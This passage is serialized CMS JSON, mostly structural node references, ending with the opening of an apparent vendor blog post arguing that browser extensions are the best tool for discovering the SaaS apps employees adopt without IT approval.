,"value":280375,"marks":313305,"data":313306},[],{},{"nodeType":178,"data":313308,"content":313309},{},[313310],{"nodeType":173,"value":280382,"marks":313311,"data":313312},[],{},{"nodeType":178,"data":313314,"content":313315},{},[313316],{"nodeType":173,"value":280389,"marks":313317,"data":313318},[],{},{"nodeType":250,"data":313320,"content":313321},{},[313322,313331,313340,313349],{"nodeType":254,"data":313323,"content":313324},{},[313325],{"nodeType":178,"data":313326,"content":313327},{},[313328],{"nodeType":173,"value":280402,"marks":313329,"data":313330},[],{},{"nodeType":254,"data":313332,"content":313333},{},[313334],{"nodeType":178,"data":313335,"content":313336},{},[313337],{"nodeType":173,"value":280412,"marks":313338,"data":313339},[],{},{"nodeType":254,"data":313341,"content":313342},{},[313343],{"nodeType":178,"data":313344,"content":313345},{},[313346],{"nodeType":173,"value":280422,"marks":313347,"data":313348},[],{},{"nodeType":254,"data":313350,"content":313351},{},[313352],{"nodeType":178,"data":313353,"content":313354},{},[313355],{"nodeType":173,"value":280432,"marks":313356,"data":313357},[],{},{"nodeType":178,"data":313359,"content":313360},{},[313361],{"nodeType":173,"value":280439,"marks":313362,"data":313363},[],{},{"nodeType":178,"data":313365,"content":313366},{},[313367],{"nodeType":173,"value":280446,"marks":313368,"data":313369},[],{},{"nodeType":169,"data":313371,"content":313372},{},[313373],{"nodeType":173,"value":280453,"marks":313374,"data":313375},[],{},{"nodeType":235,"data":313377,"content":313378},{},[313379],{"nodeType":173,"value":280460,"marks":313380,"data":313381},[],{},{"nodeType":178,"data":313383,"content":313384},{},[313385],{"nodeType":173,"value":280467,"marks":313386,"data":313387},[],{},{"nodeType":312,"data":313389,"content":313392},{"target":313390},{"sys":313391},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":313394,"content":313395},{},[313396],{"nodeType":173,"value":280480,"marks":313397,"data":313398},[],{},{"nodeType":178,"data":313400,"content":313401},{},[313402],{"nodeType":173,"value":280487,"marks":313403,"data":313404},[],{},{"nodeType":178,"data":313406,"content":313407},{},[313408],{"nodeType":173,"value":280494,"marks":313409,"data":313410},[],{},{"nodeType":178,"data":313412,"content":313413},{},[313414],{"nodeType":173,"value":280501,"marks":313415,"data":313417},[313416],{"type":1646},{},{"nodeType":235,"data":313419,"content":313420},{},[313421],{"nodeType":173,"value":280509,"marks":313422,"data":313423},[],{},{"nodeType":178,"data":313425,"content":313426},{},[313427],{"nodeType":173,"value":280516,"marks":313428,"data":313429},[],{},{"nodeType":178,"data":313431,"content":313432},{},[313433],{"nodeType":173,"value":280523,"marks":313434,"data":313435},[],{},{"nodeType":178,"data":313437,"content":313438},{},[313439],{"nodeType":173,"value":280530,"marks":313440,"data":313441},[],{},{"nodeType":178,"data":313443,"content":313444},{},[313445],{"nodeType":173,"value":280537,"marks":313446,"data":313447},[],{},{"nodeType":235,"data":313449,"content":313450},{},[313451],{"nodeType":173,"value":280544,"marks":313452,"data":313453},[],{},{"nodeType":178,"data":313455,"content":313456},{},[313457],{"nodeType":173,"value":280551,"marks":313458,"data":313459},[],{},{"nodeType":178,"data":313461,"content":313462},{},[313463,313466,313473],{"nodeType":173,"value":280558,"marks":313464,"data":313465},[],{},{"nodeType":186,"data":313467,"content":313468},{"uri":280563},[313469],{"nodeType":173,"value":280566,"marks":313470,"data":313472},[313471],{"type":194},{},{"nodeType":173,"value":280571,"marks":313474,"data":313475},[],{},{"nodeType":312,"data":313477,"content":313480},{"target":313478},{"sys":313479},{"id":280578,"type":317,"linkType":318},[],{"nodeType":178,"data":313482,"content":313483},{},[313484],{"nodeType":173,"value":280584,"marks":313485,"data":313486},[],{},{"nodeType":178,"data":313488,"content":313489},{},[313490],{"nodeType":173,"value":280591,"marks":313491,"data":313492},[],{},{"nodeType":178,"data":313494,"content":313495},{},[313496,313499],{"nodeType":173,"value":280598,"marks":313497,"data":313498},[],{},{"nodeType":173,"value":3107,"marks":313500,"data":313502},[313501],{"type":370},{},{"nodeType":178,"data":313504,"content":313505},{},[313506],{"nodeType":173,"value":280609,"marks":313507,"data":313509},[313508],{"type":370},{},{"nodeType":178,"data":313511,"content":313512},{},[313513],{"nodeType":173,"value":280617,"marks":313514,"data":313515},[],{},{"nodeType":312,"data":313517,"content":313520},{"target":313518},{"sys":313519},{"id":280624,"type":317,"linkType":318},[],{"nodeType":235,"data":313522,"content":313523},{},[313524],{"nodeType":173,"value":280630,"marks":313525,"data":313526},[],{},{"nodeType":178,"data":313528,"content":313529},{},[313530],{"nodeType":173,"value":280637,"marks":313531,"data":313532},[],{},{"nodeType":312,"data":313534,"content":313537},{"target":313535},{"sys":313536},{"id":280644,"type":317,"linkType":318},[],{"nodeType":178,"data":313539,"content":313540},{},[313541],{"nodeType":173,"value":280650,"marks":313542,"data":313543},[],{},{"nodeType":178,"data":313545,"content":313546},{},[313547],{"nodeType":173,"value":280657,"marks":313548,"data":313551},[313549,313550],{"type":1646},{"type":370},{},{"nodeType":178,"data":313553,"content":313554},{},[313555,313558,313562],{"nodeType":173,"value":280666,"marks":313556,"data":313557},[],{},{"nodeType":173,"value":280670,"marks":313559,"data":313561},[313560],{"type":370},{},{"nodeType":173,"value":280675,"marks":313563,"data":313564},[],{},{"nodeType":246189,"data":313566,"content":313567},{},[313568,313577],{"nodeType":254,"data":313569,"content":313570},{},[313571],{"nodeType":178,"data":313572,"content":313573},{},[313574],{"nodeType":173,"value":280688,"marks":313575,"data":313576},[],{},{"nodeType":254,"data":313578,"content":313579},{},[313580],{"nodeType":178,"data":313581,"content":313582},{},[313583],{"nodeType":173,"value":280698,"marks":313584,"data":313585},[],{},{"nodeType":169,"data":313587,"content":313588},{},[313589],{"nodeType":173,"value":280705,"marks":313590,"data":313591},[],{},{"nodeType":235,"data":313593,"content":313594},{},[313595],{"nodeType":173,"value":280712,"marks":313596,"data":313597},[],{},{"nodeType":178,"data":313599,"content":313600},{},[313601],{"nodeType":173,"value":280719,"marks":313602,"data":313603},[],{},{"nodeType":178,"data":313605,"content":313606},{},[313607],{"nodeType":173,"value":280726,"marks":313608,"data":313609},[],{},{"nodeType":312,"data":313611,"content":313614},{"target":313612},{"sys":313613},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":313616,"content":313617},{},[313618],{"nodeType":173,"value":280739,"marks":313619,"data":313620},[],{},{"nodeType":178,"data":313622,"content":313623},{},[313624],{"nodeType":173,"value":280746,"marks":313625,"data":313626},[],{},{"nodeType":178,"data":313628,"content":313629},{},[313630],{"nodeType":173,"value":280753,"marks":313631,"data":313632},[],{},{"nodeType":178,"data":313634,"content":313635},{},[313636],{"nodeType":173,"value":280760,"marks":313637,"data":313638},[],{},{"nodeType":178,"data":313640,"content":313641},{},[313642],{"nodeType":173,"value":280767,"marks":313643,"data":313644},[],{},{"nodeType":235,"data":313646,"content":313647},{},[313648],{"nodeType":173,"value":280774,"marks":313649,"data":313650},[],{},{"nodeType":178,"data":313652,"content":313653},{},[313654,313657,313664],{"nodeType":173,"value":280781,"marks":313655,"data":313656},[],{},{"nodeType":186,"data":313658,"content":313659},{"uri":280786},[313660],{"nodeType":173,"value":280789,"marks":313661,"data":313663},[313662],{"type":194},{},{"nodeType":173,"value":280794,"marks":313665,"data":313666},[],{},{"nodeType":178,"data":313668,"content":313669},{},[313670],{"nodeType":173,"value":280801,"marks":313671,"data":313672},[],{},{"nodeType":235,"data":313674,"content":313675},{},[313676],{"nodeType":173,"value":280808,"marks":313677,"data":313678},[],{},{"nodeType":178,"data":313680,"content":313681},{},[313682],{"nodeType":173,"value":280815,"marks":313683,"data":313684},[],{},{"nodeType":178,"data":313686,"content":313687},{},[313688],{"nodeType":173,"value":280822,"marks":313689,"data":313690},[],{},{"nodeType":178,"data":313692,"content":313693},{},[313694,313697,313701],{"nodeType":173,"value":280829,"marks":313695,"data":313696},[],{},{"nodeType":173,"value":280833,"marks":313698,"data":313700},[313699],{"type":1646},{},{"nodeType":173,"value":280838,"marks":313702,"data":313703},[],{},{"nodeType":250,"data":313705,"content":313706},{},[313707,313716,313725],{"nodeType":254,"data":313708,"content":313709},{},[313710],{"nodeType":178,"data":313711,"content":313712},{},[313713],{"nodeType":173,"value":280851,"marks":313714,"data":313715},[],{},{"nodeType":254,"data":313717,"content":313718},{},[313719],{"nodeType":178,"data":313720,"content":313721},{},[313722],{"nodeType":173,"value":280861,"marks":313723,"data":313724},[],{},{"nodeType":254,"data":313726,"content":313727},{},[313728],{"nodeType":178,"data":313729,"content":313730},{},[313731],{"nodeType":173,"value":280871,"marks":313732,"data":313733},[],{},{"nodeType":178,"data":313735,"content":313736},{},[313737],{"nodeType":173,"value":280878,"marks":313738,"data":313741},[313739,313740],{"type":1646},{"type":370},{},{"nodeType":178,"data":313743,"content":313744},{},[313745],{"nodeType":173,"value":280887,"marks":313746,"data":313747},[],{},{"nodeType":235,"data":313749,"content":313750},{},[313751],{"nodeType":173,"value":280894,"marks":313752,"data":313753},[],{},{"nodeType":178,"data":313755,"content":313756},{},[313757],{"nodeType":173,"value":280901,"marks":313758,"data":313759},[],{},{"nodeType":178,"data":313761,"content":313762},{},[313763],{"nodeType":173,"value":280908,"marks":313764,"data":313765},[],{},{"nodeType":235,"data":313767,"content":313768},{},[313769],{"nodeType":173,"value":280915,"marks":313770,"data":313771},[],{},{"nodeType":178,"data":313773,"content":313774},{},[313775],{"nodeType":173,"value":280922,"marks":313776,"data":313777},[],{},{"nodeType":178,"data":313779,"content":313780},{},[313781],{"nodeType":173,"value":280929,"marks":313782,"data":313783},[],{},{"nodeType":312,"data":313785,"content":313788},{"target":313786},{"sys":313787},{"id":280936,"type":317,"linkType":318},[],{"nodeType":178,"data":313790,"content":313791},{},[313792],{"nodeType":173,"value":280942,"marks":313793,"data":313794},[],{},{"nodeType":178,"data":313796,"content":313797},{},[313798],{"nodeType":173,"value":280949,"marks":313799,"data":313800},[],{},{"nodeType":178,"data":313802,"content":313803},{},[313804],{"nodeType":173,"value":280956,"marks":313805,"data":313806},[],{},{"nodeType":169,"data":313808,"content":313809},{},[313810],{"nodeType":173,"value":280963,"marks":313811,"data":313812},[],{},{"nodeType":178,"data":313814,"content":313815},{},[313816],{"nodeType":173,"value":280970,"marks":313817,"data":313818},[],{},{"nodeType":235,"data":313820,"content":313821},{},[313822],{"nodeType":173,"value":280977,"marks":313823,"data":313824},[],{},{"nodeType":178,"data":313826,"content":313827},{},[313828,313831,313838],{"nodeType":173,"value":280984,"marks":313829,"data":313830},[],{},{"nodeType":186,"data":313832,"content":313833},{"uri":280989},[313834],{"nodeType":173,"value":280992,"marks":313835,"data":313837},[313836],{"type":194},{},{"nodeType":173,"value":280997,"marks":313839,"data":313840},[],{},{"nodeType":178,"data":313842,"content":313843},{},[313844],{"nodeType":173,"value":281004,"marks":313845,"data":313846},[],{},{"nodeType":312,"data":313848,"content":313851},{"target":313849},{"sys":313850},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":313853,"content":313854},{},[313855],{"nodeType":173,"value":281017,"marks":313856,"data":313857},[],{},{"nodeType":246189,"data":313859,"content":313860},{},[313861,313870],{"nodeType":254,"data":313862,"content":313863},{},[313864],{"nodeType":178,"data":313865,"content":313866},{},[313867],{"nodeType":173,"value":281030,"marks":313868,"data":313869},[],{},{"nodeType":254,"data":313871,"content":313872},{},[313873],{"nodeType":178,"data":313874,"content":313875},{},[313876],{"nodeType":173,"value":281040,"marks":313877,"data":313878},[],{},{"nodeType":178,"data":313880,"content":313881},{},[313882],{"nodeType":173,"value":281047,"marks":313883,"data":313884},[],{},{"nodeType":178,"data":313886,"content":313887},{},[313888],{"nodeType":173,"value":281054,"marks":313889,"data":313890},[],{},{"nodeType":250,"data":313892,"content":313893},{},[313894,313903,313912],{"nodeType":254,"data":313895,"content":313896},{},[313897],{"nodeType":178,"data":313898,"content":313899},{},[313900],{"nodeType":173,"value":281067,"marks":313901,"data":313902},[],{},{"nodeType":254,"data":313904,"content":313905},{},[313906],{"nodeType":178,"data":313907,"content":313908},{},[313909],{"nodeType":173,"value":281077,"marks":313910,"data":313911},[],{},{"nodeType":254,"data":313913,"content":313914},{},[313915],{"nodeType":178,"data":313916,"content":313917},{},[313918],{"nodeType":173,"value":281087,"marks":313919,"data":313920},[],{},{"nodeType":178,"data":313922,"content":313923},{},[313924],{"nodeType":173,"value":281094,"marks":313925,"data":313926},[],{},{"nodeType":178,"data":313928,"content":313929},{},[313930],{"nodeType":173,"value":281101,"marks":313931,"data":313932},[],{},{"nodeType":178,"data":313934,"content":313935},{},[313936],{"nodeType":173,"value":281108,"marks":313937,"data":313938},[],{},{"nodeType":178,"data":313940,"content":313941},{},[313942],{"nodeType":173,"value":281115,"marks":313943,"data":313944},[],{},{"nodeType":250,"data":313946,"content":313947},{},[313948],{"nodeType":254,"data":313949,"content":313950},{},[313951],{"nodeType":178,"data":313952,"content":313953},{},[313954],{"nodeType":173,"value":281128,"marks":313955,"data":313956},[],{},{"nodeType":178,"data":313958,"content":313959},{},[313960],{"nodeType":173,"value":281135,"marks":313961,"data":313962},[],{},{"nodeType":250,"data":313964,"content":313965},{},[313966,314005,314014],{"nodeType":254,"data":313967,"content":313968},{},[313969],{"nodeType":178,"data":313970,"content":313971},{},[313972,313975,313982,313985,313992,313995,314002],{"nodeType":173,"value":281148,"marks":313973,"data":313974},[],{},{"nodeType":186,"data":313976,"content":313977},{"uri":281153},[313978],{"nodeType":173,"value":281156,"marks":313979,"data":313981},[313980],{"type":194},{},{"nodeType":173,"value":2936,"marks":313983,"data":313984},[],{},{"nodeType":186,"data":313986,"content":313987},{"uri":281165},[313988],{"nodeType":173,"value":211167,"marks":313989,"data":313991},[313990],{"type":194},{},{"nodeType":173,"value":2936,"marks":313993,"data":313994},[],{},{"nodeType":186,"data":313996,"content":313997},{"uri":281176},[313998],{"nodeType":173,"value":281179,"marks":313999,"data":314001},[314000],{"type":194},{},{"nodeType":173,"value":281184,"marks":314003,"data":314004},[],{},{"nodeType":254,"data":314006,"content":314007},{},[314008],{"nodeType":178,"data":314009,"content":314010},{},[314011],{"nodeType":173,"value":281194,"marks":314012,"data":314013},[],{},{"nodeType":254,"data":314015,"content":314016},{},[314017],{"nodeType":178,"data":314018,"content":314019},{},[314020],{"nodeType":173,"value":281204,"marks":314021,"data":314022},[],{},{"nodeType":235,"data":314024,"content":314025},{},[314026],{"nodeType":173,"value":281211,"marks":314027,"data":314028},[],{},{"nodeType":178,"data":314030,"content":314031},{},[314032],{"nodeType":173,"value":281218,"marks":314033,"data":314034},[],{},{"nodeType":246189,"data":314036,"content":314037},{},[314038,314047],{"nodeType":254,"data":314039,"content":314040},{},[314041],{"nodeType":178,"data":314042,"content":314043},{},[314044],{"nodeType":173,"value":281231,"marks":314045,"data":314046},[],{},{"nodeType":254,"data":314048,"content":314049},{},[314050],{"nodeType":178,"data":314051,"content":314052},{},[314053],{"nodeType":173,"value":281241,"marks":314054,"data":314055},[],{},{"nodeType":312,"data":314057,"content":314060},{"target":314058},{"sys":314059},{"id":281248,"type":317,"linkType":318},[],{"nodeType":178,"data":314062,"content":314063},{},[314064],{"nodeType":173,"value":281254,"marks":314065,"data":314066},[],{},{"nodeType":169,"data":314068,"content":314069},{},[314070],{"nodeType":173,"value":281261,"marks":314071,"data":314072},[],{},{"nodeType":178,"data":314074,"content":314075},{},[314076],{"nodeType":173,"value":281268,"marks":314077,"data":314078},[],{},{"nodeType":250,"data":314080,"content":314081},{},[314082,314091,314100],{"nodeType":254,"data":314083,"content":314084},{},[314085],{"nodeType":178,"data":314086,"content":314087},{},[314088],{"nodeType":173,"value":281281,"marks":314089,"data":314090},[],{},{"nodeType":254,"data":314092,"content":314093},{},[314094],{"nodeType":178,"data":314095,"content":314096},{},[314097],{"nodeType":173,"value":281291,"marks":314098,"data":314099},[],{},{"nodeType":254,"data":314101,"content":314102},{},[314103],{"nodeType":178,"data":314104,"content":314105},{},[314106],{"nodeType":173,"value":281301,"marks":314107,"data":314108},[],{},{"nodeType":178,"data":314110,"content":314111},{},[314112],{"nodeType":173,"value":281308,"marks":314113,"data":314114},[],{},{"nodeType":1653,"data":314116,"content":314117},{},[314118,314141,314209,314258,314296,314403],{"nodeType":1657,"data":314119,"content":314120},{},[314121,314131],{"nodeType":1687,"data":314122,"content":314123},{},[314124],{"nodeType":178,"data":314125,"content":314126},{},[314127],{"nodeType":173,"value":281324,"marks":314128,"data":314130},[314129],{"type":370},{},{"nodeType":1687,"data":314132,"content":314133},{},[314134],{"nodeType":178,"data":314135,"content":314136},{},[314137],{"nodeType":173,"value":281335,"marks":314138,"data":314140},[314139],{"type":370},{},{"nodeType":1657,"data":314142,"content":314143},{},[314144,314153],{"nodeType":1687,"data":314145,"content":314146},{},[314147],{"nodeType":178,"data":314148,"content":314149},{},[314150],{"nodeType":173,"value":281349,"marks":314151,"data":314152},[],{},{"nodeType":1687,"data":314154,"content":314155},{},[314156,314179],{"nodeType":178,"data":314157,"content":314158},{},[314159,314162,314169,314172,314176],{"nodeType":173,"value":37,"marks":314160,"data":314161},[],{},{"nodeType":186,"data":314163,"content":314164},{"uri":281363},[314165],{"nodeType":173,"value":281366,"marks":314166,"data":314168},[314167],{"type":194},{},{"nodeType":173,"value":281371,"marks":314170,"data":314171},[],{},{"nodeType":173,"value":281375,"marks":314173,"data":314175},[314174],{"type":370},{},{"nodeType":173,"value":281380,"marks":314177,"data":314178},[],{},{"nodeType":178,"data":314180,"content":314181},{},[314182,314185,314192,314195,314199,314202,314206],{"nodeType":173,"value":281387,"marks":314183,"data":314184},[],{},{"nodeType":186,"data":314186,"content":314187},{"uri":281392},[314188],{"nodeType":173,"value":281395,"marks":314189,"data":314191},[314190],{"type":194},{},{"nodeType":173,"value":281400,"marks":314193,"data":314194},[],{},{"nodeType":173,"value":281404,"marks":314196,"data":314198},[314197],{"type":370},{},{"nodeType":173,"value":281409,"marks":314200,"data":314201},[],{},{"nodeType":173,"value":281179,"marks":314203,"data":314205},[314204],{"type":370},{},{"nodeType":173,"value":281417,"marks":314207,"data":314208},[],{},{"nodeType":1657,"data":314210,"content":314211},{},[314212,314221],{"nodeType":1687,"data":314213,"content":314214},{},[314215],{"nodeType":178,"data":314216,"content":314217},{},[314218],{"nodeType":173,"value":281430,"marks":314219,"data":314220},[],{},{"nodeType":1687,"data":314222,"content":314223},{},[314224],{"nodeType":178,"data":314225,"content":314226},{},[314227,314231,314234,314241,314244,314248,314251,314255],{"nodeType":173,"value":211167,"marks":314228,"data":314230},[314229],{"type":370},{},{"nodeType":173,"value":281444,"marks":314232,"data":314233},[],{},{"nodeType":186,"data":314235,"content":314236},{"uri":281449},[314237],{"nodeType":173,"value":281452,"marks":314238,"data":314240},[314239],{"type":194},{},{"nodeType":173,"value":281457,"marks":314242,"data":314243},[],{},{"nodeType":173,"value":281461,"marks":314245,"data":314247},[314246],{"type":370},{},{"nodeType":173,"value":281466,"marks":314249,"data":314250},[],{},{"nodeType":173,"value":281404,"marks":314252,"data":314254},[314253],{"type":370},{},{"nodeType":173,"value":281474,"marks":314256,"data":314257},[],{},{"nodeType":1657,"data":314259,"content":314260},{},[314261,314270],{"nodeType":1687,"data":314262,"content":314263},{},[314264],{"nodeType":178,"data":314265,"content":314266},{},[314267],{"nodeType":173,"value":281487,"marks":314268,"data":314269},[],{},{"nodeType":1687,"data":314271,"content":314272},{},[314273],{"nodeType":178,"data":314274,"content":314275},{},[314276,314279,314283,314286,314293],{"nodeType":173,"value":281497,"marks":314277,"data":314278},[],{},{"nodeType":173,"value":211167,"marks":314280,"data":314282},[314281],{"type":370},{},{"nodeType":173,"value":281505,"marks":314284,"data":314285},[],{},{"nodeType":186,"data":314287,"content":314288},{"uri":281510},[314289],{"nodeType":173,"value":281513,"marks":314290,"data":314292},[314291],{"type":194},{},{"nodeType":173,"value":37,"marks":314294,"data":314295},[],{},{"nodeType":1657,"data":314297,"content":314298},{},[314299,314308],{"nodeType":1687,"data":314300,"content":314301},{},[314302],{"nodeType":178,"data":314303,"content":314304},{},[314305],{"nodeType":173,"value":281530,"marks":314306,"data":314307},[],{},{"nodeType":1687,"data":314309,"content":314310},{},[314311,314345,314368,314381,314397],{"nodeType":178,"data":314312,"content":314313},{},[314314,314318,314321,314325,314328,314335,314338,314342],{"nodeType":173,"value":281179,"marks":314315,"data":314317},[314316],{"type":370},{},{"nodeType":173,"value":281544,"marks":314319,"data":314320},[],{},{"nodeType":173,"value":211167,"marks":314322,"data":314324},[314323],{"type":370},{},{"nodeType":173,"value":281552,"marks":314326,"data":314327},[],{},{"nodeType":186,"data":314329,"content":314330},{"uri":281557},[314331],{"nodeType":173,"value":281560,"marks":314332,"data":314334},[314333],{"type":194},{},{"nodeType":173,"value":281565,"marks":314336,"data":314337},[],{},{"nodeType":173,"value":281569,"marks":314339,"data":314341},[314340],{"type":370},{},{"nodeType":173,"value":281574,"marks":314343,"data":314344},[],{},{"nodeType":178,"data":314346,"content":314347},{},[314348,314351,314355,314358,314365],{"nodeType":173,"value":281581,"marks":314349,"data":314350},[],{},{"nodeType":173,"value":281179,"marks":314352,"data":314354},[314353],{"type":370},{},{"nodeType":173,"value":3107,"marks":314356,"data":314357},[],{},{"nodeType":186,"data":314359,"content":314360},{"uri":281593},[314361],{"nodeType":173,"value":281596,"marks":314362,"data":314364},[314363],{"type":194},{},{"nodeType":173,"value":281601,"marks":314366,"data":314367},[],{},{"nodeType":178,"data":314369,"content":314370},{},[314371,314374,314378],{"nodeType":173,"value":281608,"marks":314372,"data":314373},[],{},{"nodeType":173,"value":3107,"marks":314375,"data":314377},[314376],{"type":370},{},{"nodeType":173,"value":281616,"marks":314379,"data":314380},[],{},{"nodeType":178,"data":314382,"content":314383},{},[314384,314387,314394],{"nodeType":173,"value":281623,"marks":314385,"data":314386},[],{},{"nodeType":186,"data":314388,"content":314389},{"uri":281628},[314390],{"nodeType":173,"value":281631,"marks":314391,"data":314393},[314392],{"type":194},{},{"nodeType":173,"value":197,"marks":314395,"data":314396},[],{},{"nodeType":178,"data":314398,"content":314399},{},[314400],{"nodeType":173,"value":281642,"marks":314401,"data":314402},[],{},{"nodeType":1657,"data":314404,"content":314405},{},[314406,314415],{"nodeType":1687,"data":314407,"content":314408},{},[314409],{"nodeType":178,"data":314410,"content":314411},{},[314412],{"nodeType":173,"value":281655,"marks":314413,"data":314414},[],{},{"nodeType":1687,"data":314416,"content":314417},{},[314418],{"nodeType":178,"data":314419,"content":314420},{},[314421,314424,314431,314434,314438,314441,314453],{"nodeType":173,"value":281665,"marks":314422,"data":314423},[],{},{"nodeType":186,"data":314425,"content":314426},{"uri":281670},[314427],{"nodeType":173,"value":281673,"marks":314428,"data":314430},[314429],{"type":194},{},{"nodeType":173,"value":281678,"marks":314432,"data":314433},[],{},{"nodeType":173,"value":211167,"marks":314435,"data":314437},[314436],{"type":370},{},{"nodeType":173,"value":933,"marks":314439,"data":314440},[],{},{"nodeType":186,"data":314442,"content":314443},{"uri":281690},[314444,314449],{"nodeType":173,"value":281693,"marks":314445,"data":314448},[314446,314447],{"type":194},{"type":370},{},{"nodeType":173,"value":281699,"marks":314450,"data":314452},[314451],{"type":194},{},{"nodeType":173,"value":281704,"marks":314454,"data":314455},[],{},{"nodeType":178,"data":314457,"content":314458},{},[314459],{"nodeType":173,"value":281711,"marks":314460,"data":314461},[],{},{"nodeType":178,"data":314463,"content":314464},{},[314465,314468,314475],{"nodeType":173,"value":281718,"marks":314466,"data":314467},[],{},{"nodeType":186,"data":314469,"content":314470},{"uri":281723},[314471],{"nodeType":173,"value":281156,"marks":314472,"data":314474},[314473],{"type":194},{},{"nodeType":173,"value":281730,"marks":314476,"data":314477},[],{},{"nodeType":178,"data":314479,"content":314480},{},[314481],{"nodeType":173,"value":281737,"marks":314482,"data":314483},[],{},{"nodeType":178,"data":314485,"content":314486},{},[314487],{"nodeType":173,"value":281744,"marks":314488,"data":314491},[314489,314490],{"type":370},{"type":1646},{},{"nodeType":178,"data":314493,"content":314494},{},[314495,314498,314502],{"nodeType":173,"value":281753,"marks":314496,"data":314497},[],{},{"nodeType":173,"value":281757,"marks":314499,"data":314501},[314500],{"type":1646},{},{"nodeType":173,"value":281762,"marks":314503,"data":314504},[],{},{"nodeType":169,"data":314506,"content":314507},{},[314508],{"nodeType":173,"value":281769,"marks":314509,"data":314510},[],{},{"nodeType":178,"data":314512,"content":314513},{},[314514],{"nodeType":173,"value":281776,"marks":314515,"data":314516},[],{},{"nodeType":178,"data":314518,"content":314519},{},[314520],{"nodeType":173,"value":281783,"marks":314521,"data":314522},[],{},{"items":314524},[314525,314527],{"sys":314526,"name":505},{"id":504},{"sys":314528,"name":274157},{"id":274156},{"items":314530},[314531],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":314532},{"url":13981},{"__typename":1528,"sys":314534,"content":314535,"title":286444,"synopsis":314902,"hashTags":118,"publishedDate":314903,"slug":286445,"tagsCollection":314904,"authorsCollection":314910},{"id":273937},{"json":314536},{"nodeType":165,"data":314537,"content":314538},{},[314539,314546,314553,314560,314566,314573,314592,314611,314618,314625,314632,314637,314644,314662,314682,314689,314696,314716,314732,314748,314755,314775,314782,314801,314808,314815,314822,314829,314836,314854,314861,314868,314875,314882,314889,314895],{"nodeType":178,"data":314540,"content":314541},{},[314542],{"nodeType":173,"value":314543,"marks":314544,"data":314545},"Security teams know they need full visibility into which SaaS platforms employees are using to even start focusing on SaaS management and security. Even better, they want to understand how employees are using them, right? ",[],{},{"nodeType":178,"data":314547,"content":314548},{},[314549],{"nodeType":173,"value":314550,"marks":314551,"data":314552},"Many people we talk to are starting to chip away at getting visibility into employee-adopted apps by using some combination of central information repositories such as email discovery, financial records, OAuth logs, SSO logs, web proxy logs, etc. So why would anyone want or need to use a browser extension? Browser extensions are the most effective SaaS discovery tool because they can capture employee SaaS use and adoption in real time, as employees sign up. The browser also allows us to work with the user to guide them to use SaaS more securely right where they’re working - in the browser.",[],{},{"nodeType":178,"data":314554,"content":314555},{},[314556],{"nodeType":173,"value":314557,"marks":314558,"data":314559},"We’ll dig into this topic a bit more in this article and we’d love to hear questions, concerns, and have a healthy debate on our social media channels, so hit us up!",[],{},{"nodeType":235,"data":314561,"content":314562},{},[314563],{"nodeType":173,"value":258287,"marks":314564,"data":314565},[],{},{"nodeType":178,"data":314567,"content":314568},{},[314569],{"nodeType":173,"value":314570,"marks":314571,"data":314572},"Different approaches for discovering SaaS use have unique advantages and disadvantages and the most effective solution is usually to combine several approaches that complement one another. That being said, in the case of SaaS discovery, browser extensions have some really significant advantages that can’t be matched by other approaches - so if you could only pick one approach, then a browser extension is the way to go.",[],{},{"nodeType":178,"data":314574,"content":314575},{},[314576,314580,314588],{"nodeType":173,"value":314577,"marks":314578,"data":314579},"The first point to consider is that it is extremely common for SaaS solutions to be self-adopted by individual employees or teams within a business, without working with IT or following the established procurement process. ",[],{},{"nodeType":186,"data":314581,"content":314582},{"uri":296916},[314583],{"nodeType":173,"value":314584,"marks":314585,"data":314587},"According to G2",[314586],{"type":194},{},{"nodeType":173,"value":314589,"marks":314590,"data":314591},", 80% of workers admit to using SaaS applications at work without getting approval from IT. Employees are likely to access SaaS however is easiest and most familiar for them. So, employees aren’t going to set up a full SSO connection with your own authentication provider (on the off chance that the app even provides SSO integration). They might not be using a social login using your M365/Google tenant and they might not even be using their company email to sign up/login - they could just be using a personal webmail account.",[],{},{"nodeType":178,"data":314593,"content":314594},{},[314595,314599,314607],{"nodeType":173,"value":314596,"marks":314597,"data":314598},"That leaves security teams with limited or no visibility of employee SaaS use using other centralized methods. We found that only around 30% of SaaS providers we analyzed support SSO and of those that do, many require paying for the highest cost enterprise plan in order to gain access to it - i.e. “",[],{},{"nodeType":186,"data":314600,"content":314601},{"uri":27492},[314602],{"nodeType":173,"value":314603,"marks":314604,"data":314606},"The SSO tax",[314605],{"type":194},{},{"nodeType":173,"value":314608,"marks":314609,"data":314610},".” ",[],{},{"nodeType":178,"data":314612,"content":314613},{},[314614],{"nodeType":173,"value":314615,"marks":314616,"data":314617},"Many don’t support social logins and, if they do, you’ll find M365 social logins are much less commonly supported than Google, so if you’re a Microsoft house, that pushes users towards individual email/password logins, which are far less secure.",[],{},{"nodeType":235,"data":314619,"content":314620},{},[314621],{"nodeType":173,"value":314622,"marks":314623,"data":314624},"A comparison of data sources for SaaS discovery",[],{},{"nodeType":178,"data":314626,"content":314627},{},[314628],{"nodeType":173,"value":314629,"marks":314630,"data":314631},"We won’t do a deep dive of comparing data sources for SaaS discovery in this post, but here’s a quick and dirty overview. As we mentioned above, most companies (and off-the-shelf SaaS security and SaaS management tools) use some combination of the data sources depicted in the image below. ",[],{},{"nodeType":312,"data":314633,"content":314636},{"target":314634},{"sys":314635},{"id":308832,"type":317,"linkType":318},[],{"nodeType":178,"data":314638,"content":314639},{},[314640],{"nodeType":173,"value":314641,"marks":314642,"data":314643}," Now, it goes without saying that we’re a bit biased, but as we were deciding how to build our own SaaS discovery methods, we analyzed the pros and cons of each of these approaches before realizing that the most power was in the browser. Ease of deployment, you’ll notice, takes a bit more work than a couple other methods, but it’s worth it once you realize the powerful capabilities uniquely available in the browser. We’ll address the deployment and rollout challenges in a bit more detail later in this post. ",[],{},{"nodeType":178,"data":314645,"content":314646},{},[314647,314651,314659],{"nodeType":173,"value":314648,"marks":314649,"data":314650},"To dig into each of these approaches and how to potentially combine them to build your own SaaS discovery engine, check out ",[],{},{"nodeType":186,"data":314652,"content":314653},{"uri":296864},[314654],{"nodeType":173,"value":314655,"marks":314656,"data":314658},"this post.",[314657],{"type":194},{},{"nodeType":173,"value":10557,"marks":314660,"data":314661},[],{},{"nodeType":178,"data":314663,"content":314664},{},[314665,314669,314678],{"nodeType":173,"value":314666,"marks":314667,"data":314668},"If you already know you don’t have the resources (time, team, budget) 